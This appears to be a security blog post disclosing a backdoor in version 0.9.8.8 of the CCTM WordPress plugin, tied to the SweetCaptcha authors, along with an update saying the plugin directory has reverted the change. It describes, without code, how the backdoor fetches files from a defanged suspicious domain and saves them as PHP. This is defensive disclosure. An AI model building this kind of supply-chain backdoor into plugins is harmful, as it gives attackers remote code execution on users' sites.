Update March 7: The WordPress Directory team investigated and mitigated this issue by disconnecting thewooranker account from all plugins, reverting malicious changes in the CCTM plugin, and changing the version to 0.9.8.9. WordPress should automatically update to this new clean version.
If your site was compromised during the timeframe while the backdoored version (0.9.8.8) was installed,updating to 0.9.8.9 is not enough to clean the site – Please check the Mitigation section at the end of this blogpost.
Last summer we shared a story about the SweetCaptcha WordPress plugin injecting ads and causingmalvertising problems for websites that leveraged the plugin. When this plugin was removed from the officialWordPress Plugin directory, the authors revived another WordPress account with a long abandoned plugin
It’s a backdoor that can download files from hxxp:/ /wordpresscore .com/plugins /cctm /update/ (the domain name is definitely very suspicious) and save them with the .php extension in the plugin directory.
It looked like a typical backdoor that could be uploaded anywhere on a compromised server, not just in this particular plugin. We decided to check the original plugin package and, to our surprise, found the file in the source! We also discovered that we were not the only ones that found this file (although people on the forumseemed to believe that the file was just “vulnerable”). This really was worth investigating.